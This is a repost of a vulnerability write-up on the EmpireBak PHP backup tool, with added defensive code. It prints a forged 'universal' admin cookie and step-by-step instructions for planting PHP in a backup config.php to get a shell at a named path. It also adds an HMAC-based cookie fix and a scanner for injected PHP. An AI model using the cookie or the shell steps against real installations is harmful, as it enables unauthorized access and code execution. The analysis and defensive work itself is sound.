EmpireBak (帝国备份王) universal cookie and shell method, with defenses
Reposted from wooyun http://www.wooyun.org/bugs/wooyun-2014-078591 <br />1. Forge a cookie to log in to the system (this step is actually redundant: most users never change the password, and it is still the default 123456) <br /><br />On a successful login four cookies are set; see the code<br /><br /><div class="codeText">
<div class="codeHead"><span class="lantxt">PHP Code</span><span onclick="copyIdText('code_9132')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_9132">
<ol class="dp-c">
<li class="alt"><span><span class="keyword">function</span><span> login(</span><span class="vars">$lusername</span><span>,</span><span class="vars">$lpassword</span><span>,</span><span class="vars">$key</span><span>,</span><span class="vars">$lifetime</span><span>=0){ </span></span> </li>
<li><span></span><span class="keyword">global</span><span> </span><span class="vars">$set_username</span><span>,</span><span class="vars">$set_password</span><span>,</span><span class="vars">$set_loginauth</span><span>,</span><span class="vars">$set_loginkey</span><span>; </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(</span><span class="func">empty</span><span class="keyword">empty</span><span>(</span><span class="vars">$lusername</span><span>)||</span><span class="func">empty</span><span class="keyword">empty</span><span>(</span><span class="vars">$lpassword</span><span>)) { </span> </li>
<li><span>printerror(</span><span class="string">"EmptyLoginUser"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li class="alt"><span>} </span> </li>
<li><span></span><span class="comment">//验证码 </span><span> </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(!</span><span class="vars">$set_loginkey</span><span>) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(</span><span class="vars">$key</span><span><>getcvar(</span><span class="string">'checkkey'</span><span>)||</span><span class="func">empty</span><span class="keyword">empty</span><span>(</span><span class="vars">$key</span><span>)) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"FailLoginKey"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li><span>} </span> </li>
<li class="alt"><span>} </span> </li>
<li><span></span><span class="keyword">if</span><span>(md5(</span><span class="vars">$lusername</span><span>)<>md5(</span><span class="vars">$set_username</span><span>)||md5(</span><span class="vars">$lpassword</span><span>)<></span><span class="vars">$set_password</span><span>) </span> </li>
<li class="alt"><span>{ </span> </li>
<li><span>printerror(</span><span class="string">"ErrorUser"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li class="alt"><span>} </span> </li>
<li><span></span><span class="comment">//认证码 </span><span> </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(</span><span class="vars">$set_loginauth</span><span>&</span><span class="vars">$set_loginauth</span><span>!=</span><span class="vars">$_POST</span><span>[</span><span class="string">'loginauth'</span><span>]) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"ErrorLoginAuth"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li><span>} </span> </li>
<li class="alt"><span></span><span class="vars">$logintime</span><span>=time(); </span> </li>
<li><span></span><span class="vars">$rnd</span><span>=make_password(12);</span><span class="comment">//生成随机字符 </span><span> </span> </li>
<li class="alt"><span></span><span class="vars">$s1</span><span>=esetcookie(</span><span class="string">"bakusername"</span><span>,</span><span class="vars">$lusername</span><span>,0); </span> </li>
<li><span></span><span class="vars">$s2</span><span>=esetcookie(</span><span class="string">"bakrnd"</span><span>,</span><span class="vars">$rnd</span><span>,0);</span><span class="comment">//随机字符 </span><span> </span> </li>
<li class="alt"><span></span><span class="vars">$s3</span><span>=esetcookie(</span><span class="string">"baklogintime"</span><span>,</span><span class="vars">$logintime</span><span>,0); </span> </li>
<li><span>Ebak_SCookieRnd(</span><span class="vars">$lusername</span><span>,</span><span class="vars">$rnd</span><span>);</span><span class="comment">// </span><span> </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(!</span><span class="vars">$s1</span><span>||!</span><span class="vars">$s2</span><span>) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"NotOpenCookie"</span><span>,</span><span class="string">"index.php"</span><span>); </span> </li>
<li><span>} </span> </li>
<li class="alt"><span>printerror(</span><span class="string">"LoginSuccess"</span><span>,</span><span class="string">"admin.php"</span><span>); </span> </li>
<li><span>} </span> </li>
</ol>
</div>
</div>
<p>Now look at the make_password function<br /><br /></p>
<div class="codeText">
<div class="codeHead"><span class="lantxt">PHP Code</span><span onclick="copyIdText('code_8236')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_8236">
<ol class="dp-c">
<li class="alt"><span><span class="keyword">function</span><span> make_password(</span><span class="vars">$pw_length</span><span>){ </span></span> </li>
<li><span></span><span class="vars">$low_ascii_bound</span><span>=50; </span> </li>
<li class="alt"><span></span><span class="vars">$upper_ascii_bound</span><span>=122; </span> </li>
<li><span></span><span class="vars">$notuse</span><span>=</span><span class="keyword">array</span><span>(58,59,60,61,62,63,64,73,79,91,92,93,94,95,96,108,111); </span> </li>
<li class="alt"><span></span><span class="keyword">while</span><span>(</span><span class="vars">$i</span><span><</span><span class="vars">$pw_length</span><span>) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span>mt_srand((double)microtime()*1000000); </span> </li>
<li><span></span><span class="vars">$randnum</span><span>=mt_rand(</span><span class="vars">$low_ascii_bound</span><span>,</span><span class="vars">$upper_ascii_bound</span><span>); </span> </li>
<li class="alt"><span></span><span class="keyword">if</span><span>(!in_array(</span><span class="vars">$randnum</span><span>,</span><span class="vars">$notuse</span><span>)) </span> </li>
<li><span>{ </span> </li>
<li class="alt"><span></span><span class="vars">$password1</span><span>=</span><span class="vars">$password1</span><span>.</span><span class="func">chr</span><span>(</span><span class="vars">$randnum</span><span>); </span> </li>
<li><span></span><span class="vars">$i</span><span>++; </span> </li>
<li class="alt"><span>} </span> </li>
<li><span>} </span> </li>
<li class="alt"><span></span><span class="keyword">return</span><span> </span><span class="vars">$password1</span><span>; </span> </li>
<li><span>} </span> </li>
</ol>
</div>
</div>
<p>This function only produces a random string; now look at the Ebak_SCookieRnd function<br /><br /></p>
<div class="codeText">
<div class="codeHead"><span class="lantxt">PHP Code</span><span onclick="copyIdText('code_3838')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_3838">
<ol class="dp-c">
<li class="alt"><span><span class="keyword">function</span><span> Ebak_SCookieRnd(</span><span class="vars">$username</span><span>,</span><span class="vars">$rnd</span><span>){ </span></span> </li>
<li><span></span><span class="keyword">global</span><span> </span><span class="vars">$set_loginrnd</span><span>;</span><span class="comment">//$set_loginrnd为config.php里面的验证随机码 </span><span> </span> </li>
<li class="alt"><span></span><span class="vars">$ckpass</span><span>=md5(md5(</span><span class="vars">$rnd</span><span>.</span><span class="vars">$set_loginrnd</span><span>).</span><span class="string">'-'</span><span>.</span><span class="vars">$rnd</span><span>.</span><span class="string">'-'</span><span>.</span><span class="vars">$username</span><span>.</span><span class="string">'-'</span><span>);</span><span class="comment">//没有把密码加进去,于是漏洞产生了 </span><span> </span> </li>
<li><span>esetcookie(</span><span class="string">"loginebakckpass"</span><span>,</span><span class="vars">$ckpass</span><span>,0); </span> </li>
<li class="alt"><span>} </span> </li>
</ol>
</div>
</div>
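<p>As an added defensive example (not code from the write-up or from EmpireBak), here is a cookie scheme that closes the gap shown above. The original $ckpass is an unkeyed md5 over $rnd, the config secret and the username, so neither the password nor the login time is bound to the token, and on later requests the server can only check what it reads back from the cookies; make_password also seeds mt_rand from the clock. The replacement uses random_bytes for the nonce, an HMAC keyed with the per-install $set_loginrnd over username, nonce, login time and the stored password hash, a bounded cookie age, and hash_equals for comparison. The ebak_* function names, the demo values and the assumption that $set_password is the stored md5 of the admin password are assumptions for this example; the cookie names are the ebak_ ones listed on the page.</p>

```php
<?php
// Added defensive example, not EmpireBak's own code. The ebak_* function names,
// the demo values and the assumption that $set_password is the stored md5 of the
// admin password (as login() above compares it) are assumptions for this example;
// $set_loginrnd stands for the per-install secret from config.php.

// Nonce from the CSPRNG instead of mt_srand((double)microtime()*1000000).
function ebak_make_rnd(): string {
    return bin2hex(random_bytes(16));
}

// Keyed MAC over everything the server later trusts: username, nonce, login
// time and the stored password hash. Changing the password invalidates every
// existing cookie, and without $set_loginrnd the value cannot be recomputed.
function ebak_cookie_token(string $username, string $rnd, int $logintime,
                           string $set_loginrnd, string $set_password): string {
    $msg = implode("\x00", [$username, $rnd, (string)$logintime, $set_password]);
    return hash_hmac('sha256', $msg, $set_loginrnd);
}

// Verify the four ebak_* cookies read back from the client on a later request.
function ebak_verify_cookie(array $cookie, string $set_loginrnd, string $set_username,
                            string $set_password, int $now, int $maxAge = 86400): bool {
    foreach (['ebak_bakusername', 'ebak_bakrnd', 'ebak_baklogintime', 'ebak_loginebakckpass'] as $k) {
        if (!isset($cookie[$k]) || !is_string($cookie[$k])) {
            return false;
        }
    }
    if ($cookie['ebak_bakusername'] !== $set_username) {
        return false;
    }
    if (!ctype_digit($cookie['ebak_baklogintime'])) {
        return false;
    }
    $t = (int)$cookie['ebak_baklogintime'];
    // Reject future-dated or stale login times: the universal cookie on this page
    // carries baklogintime 4070883661, a timestamp in the year 2099.
    if ($t > $now || ($now - $t) > $maxAge) {
        return false;
    }
    $expected = ebak_cookie_token($cookie['ebak_bakusername'], $cookie['ebak_bakrnd'],
                                  $t, $set_loginrnd, $set_password);
    return hash_equals($expected, $cookie['ebak_loginebakckpass']);
}

// Constructed demo values.
$set_loginrnd = 'replace-with-a-long-random-per-install-secret';
$set_username = 'admin';
$set_password = md5('123456');
$rnd   = ebak_make_rnd();
$login = time();
$cookie = [
    'ebak_bakusername'     => 'admin',
    'ebak_bakrnd'          => $rnd,
    'ebak_baklogintime'    => (string)$login,
    'ebak_loginebakckpass' => ebak_cookie_token('admin', $rnd, $login, $set_loginrnd, $set_password),
];
var_dump(ebak_verify_cookie($cookie, $set_loginrnd, $set_username, $set_password, time()));
// The same cookie after a password change, and with a far-future login time.
var_dump(ebak_verify_cookie($cookie, $set_loginrnd, $set_username, md5('changed'), time()));
$forged = $cookie;
$forged['ebak_baklogintime'] = '4070883661';
var_dump(ebak_verify_cookie($forged, $set_loginrnd, $set_username, $set_password, time()));
```

<p>The design point is that the secret is generated per installation and never reused from a default config: a token is then only valid on the install whose secret produced it, and a password rotation or an expired login time is enough to retire it.</p>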
<p>The universal cookie (key:value) is as follows:<br /><br /></p>
<div class="codeText">
<div class="codeHead"><span class="lantxt">XML/HTML Code</span><span onclick="copyIdText('code_1183')" class="copyCodeText" style="CURSOR: pointer">复制内容到剪贴板</span></div>
<div id="code_1183">
<ol class="dp-xml">
<li class="alt"><span><span>ebak_loginebakckpass:119770adb578053dcb383f67a81bcbc6 </span></span> </li>
<li><span>ebak_bakrnd:35y5cCnnA4Kh </span> </li>
<li class="alt"><span>ebak_bakusername:admin </span> </li>
<li><span>ebak_baklogintime:4070883661 </span> </li>
</ol>
</div>
</div>
<p>With the cookie above you can open admin.php directly <br /><br /><strong>2. Getting a shell</strong> <br /><br />The backend parameters are usually already configured; if it cannot connect to the database, enter a remote database of your own under the database settings. <br /><br />Back up data: pick any database and back it up, <br /><br />then go to "replace directory file content", select the database just backed up, <br /><br />and replace "$b_table=" <br /><br />with <br /><br />"phpinfo(); <br /><br />$b_table="<br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201509/20150914231931.png" /><br />The shell path is then bdata/mysql_20141007221849/config.php<br /><br /><img alt="" src="https://img.jbzj.com/file_images/article/201509/20150914231932.png" /></p>
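<p>An added detection example, not code from the write-up or from EmpireBak: a sweep over the backup directory for PHP that was injected through the "replace directory file content" step described above. It assumes that a legitimate bdata/&lt;backup&gt;/config.php contains only assignments of strings, numbers or arrays to variables (as the $b_table= line on the page suggests), so any other statement, such as a function call, is reported. The bdata/.../config.php layout is from the page; the function names and the sample file contents are constructed for this example, and the allowlist should be tuned against a known-good backup before use.</p>

```php
<?php
// Added example, not EmpireBak's own code: sweep backup config files for
// injected PHP. Assumption: a legitimate bdata/<backup>/config.php contains only
// assignments of strings, numbers or arrays to variables ($b_table="..."; etc.),
// so any other token (a function call such as phpinfo();) is a finding.

function ebak_config_is_clean(string $src, array &$findings = []): bool {
    $allowedTokens = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT,
                      T_VARIABLE, T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER,
                      T_ARRAY, T_DOUBLE_ARROW];
    $allowedChars  = ['=', ';', '(', ')', '[', ']', ',', '-'];
    $findings = [];
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok)) {
            [$id, $text, $line] = $tok;
            if (!in_array($id, $allowedTokens, true)) {
                $findings[] = sprintf('line %d: unexpected %s "%s"',
                                      $line, token_name($id), trim($text));
            }
        } elseif (!in_array($tok, $allowedChars, true)) {
            $findings[] = sprintf('unexpected character "%s"', $tok);
        }
    }
    return $findings === [];
}

// Walk bdata/*/config.php and return the files that fail the allowlist check,
// keyed by path, with the findings for each.
function ebak_scan_backups(string $bdata): array {
    $bad = [];
    foreach (glob($bdata . '/*/config.php') ?: [] as $file) {
        $findings = [];
        if (!ebak_config_is_clean((string)file_get_contents($file), $findings)) {
            $bad[$file] = $findings;
        }
    }
    return $bad;
}

// Constructed samples (not real backup files): a clean config, and one where
// "$b_table=" was replaced with "phpinfo();\n$b_table=" as described above.
$clean    = "<?php\n\$b_table=\"sample_table\";\n\$b_dbname=\"sample_db\";\n?>";
$injected = "<?php\nphpinfo();\n\$b_table=\"sample_table\";\n\$b_dbname=\"sample_db\";\n?>";

$f = [];
var_dump(ebak_config_is_clean($clean, $f));
var_dump(ebak_config_is_clean($injected, $f));
print_r($f);
```

<p>Running ebak_scan_backups('bdata') from a cron job or an incident-response checklist turns the path the write-up names into a monitored location; the longer-term fix is to keep the backup directory out of the web root or deny PHP execution in it, so a modified config.php cannot be reached as a script at all.</p>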